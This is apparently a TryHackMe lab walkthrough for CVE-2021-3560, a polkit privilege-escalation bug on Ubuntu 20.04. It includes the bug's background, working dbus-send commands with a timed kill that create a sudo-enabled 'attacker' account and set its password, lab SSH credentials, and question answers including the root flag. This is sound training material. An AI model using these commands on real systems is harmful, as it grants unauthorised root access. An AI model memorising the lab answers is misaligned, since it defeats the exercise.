Polkit: CVE-2021-3560

Walkthrough room for CVE-2021-3560

Task 1 Info Deploy

Due to the services required to make this vulnerability work, this machine will take up to three minutes to deploy fully. Take the time to read the information in the following tasks before attempting to exploit it.

The exploit detailed in this room would often make use of a GUI desktop. For the sake of speed we will use the CLI. In-browser access is enabled for this machine; however, be aware that copy/paste functionality will only work if you full-screen the target in a browser that is not Firefox. Should you prefer to SSH in for yourself; credentials for this will be given in the relevant task.

Question: Click the green “Start Machine” button to deploy the machine!

Answer: No Answer Needed

Task 2 Info Important! About Dynamic Flags

This box is the first on TryHackMe to use dynamic flags. As such, this is very much in beta, so please report any bugs to MuirlandOracle in the TryHackMe Discord Server.

Read the following information carefully before continuing:

• When you complete the box you will find a flag at /root/root.txt. This will not look like a regular TryHackMe flag:

Everything in the file should be submitted as a flag – including any symbols or special characters.

• This flag will be different every time you deploy the box. Each flag can be used exactly once, and will expire after six hours (so make sure to submit quickly!)

• When you have retrieved the flag, do not submit it directly into the TryHackMe answer field. Dynamic flags should be submitted to https://flag.muir.land/. This site is run by the room author and is not affiliated directly with TryHackMe.

  • You will be asked to submit three pieces of information:
  • Your username. It is very important that this is identical to your TryHackMe username!
  • The box code. In most instances this will be the same as the room code. For this room the code will be: polkit The flag

Read the information in the task.

Question: What is the URL of the website you should submit dynamic flags to?

Answer: https://flag.muir.land/

Task 3 Tutorial Background

Overview

In early 2021 a researcher named Kevin Backhouse discovered a seven year old privilege escalation vulnerability (since designated CVE-2021-3560) in the Linux polkit utility. Fortunately, different distributions of Linux (and even different versions of the same distributions) use different versions of the software, meaning that only some are vulnerable.

[…]

For this room we will be focussing specifically on Ubuntu 20.04. Canonical released a patch for their version of polkit (policykit-1), which has version number 0.105-26ubuntu1.1. The last vulnerable version available in the apt repositories for Focal Fossa is 0.105-26ubuntu1, so, if you see this, you may be in luck!

We can use apt list --installed | grep policykit-1 to check the installed version of polkit

The original description of this vulnerability can be found in a post written by Kevin Backhouse, here.

How is Polkit vulnerable?

The next logical question is of course: “How can we exploit polkit”?

The short answer is: by manually sending dbus messages to the dbus-daemon (effectively an API to allow different processes the ability to communicate with each other), then killing the request before it has been fully processed, we can trick polkit into authorising the command. If you are not familiar with daemons, they are effectively background services running on Linux. The dbus-daemon is a program running in the background which brokers messages between applications.

[…]

Question: In what version of Ubuntu’s policykit-1 is CVE-2021-2560 patched?

Answer: 0.105-26ubuntu1.1

Question: What program can we use to run commands as other users via polkit?

Answer: pkexec

Tutorial Exploitation Process

We’ve seen the theory, now let’s see it in action!

Let’s try to add a new user called attacker, with sudo permissions, and a password of Expl01ted. Just read this information for now – you will have time to try it in the next task!

First, let’s look at the dbus messages we’ll need to send:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1

This command will manually send a dbus message to the accounts daemon, printing the response and creating a new user called attacker (string:attacker) with a description of “Pentester Account” (string:"Pentester Account") and membership of the sudo group set to true (referenced by theint32:1 flag).

Our second dbus message will set a password for the new account:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUSER_ID org.freedesktop.Accounts.User.SetPassword string:'PASSWORD_HASH' string:'Ask the pentester'

[…]

We need a password hash here, so let’s generate a Sha512Crypt hash for our chosen password (Expl01ted): openssl passwd -6 Expl01ted

Using openssl, we generate a password of type 6 (SHA512-crypt) and our plaintext password (Expl01ted).

Now let’s finish this! 5 milliseconds worked last time, so it should work here too:

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!

With a hop, su, and a sudo -s, we have root!

Practical Do it for yourself!

You’ve seen the theory, so now it’s time to try for yourself!

If you would like to SSH into the target machine, the credentials are:

• Username: tryhackme
• Password: TryHackMe123!

Otherwise please feel free to use the in-browser access on the right hand side of the screen. Bear in mind that the AttackBox can be deployed in tandem with the target machine.

Perform the CVE-2021-3560 exploit and get the flag from /root/root.txt! Remember to submit the flag you find on the box to https://flag.muir.land/ in order to receive the final flag to submit below.

Follow the step of Tutorial Exploitation Process

Question: Root Flag

Answer: THM{N2I0MTgzZTE4ZWQ0OGY0NjdiNTQ0NTZi}

Note: this flag is dynamic.